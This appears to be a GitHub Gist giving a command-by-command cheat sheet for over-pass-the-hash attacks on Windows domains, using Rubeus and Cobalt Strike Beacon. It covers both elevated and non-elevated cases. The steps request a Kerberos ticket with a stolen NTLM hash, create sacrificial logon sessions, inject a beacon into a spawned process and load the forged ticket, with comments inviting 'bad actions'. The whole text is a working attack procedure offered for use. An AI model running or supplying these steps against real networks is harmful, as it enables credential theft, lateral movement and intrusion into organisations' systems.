Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
# inject the .kirbi
beacon> kerberos_ticket_use /home/user/ticket.kirbi
# do bad actions :)
# revert- clears out the sacrificial logon session, so the original context's tickets are restored to normal
beacon> rev2self
##### IF NOT ELEVATED
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
# Create a sacrificial process. We have to do this due to the way beacon handles tokens now. You can't create a process with a token as a low prived user.
beacon> run C:\Windows\System32\upnpcont.exe
# inject into the newly spawned process
beacon> inject x64 <NEW_PID> <listener_name>
# inject the .kirbi
new beacon> kerberos_ticket_use /home/user/ticket.kirbi
# do bad actions :)
# kill the runas beacon when actions are completed
# revert in the original beacon-
beacon> rev2self
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.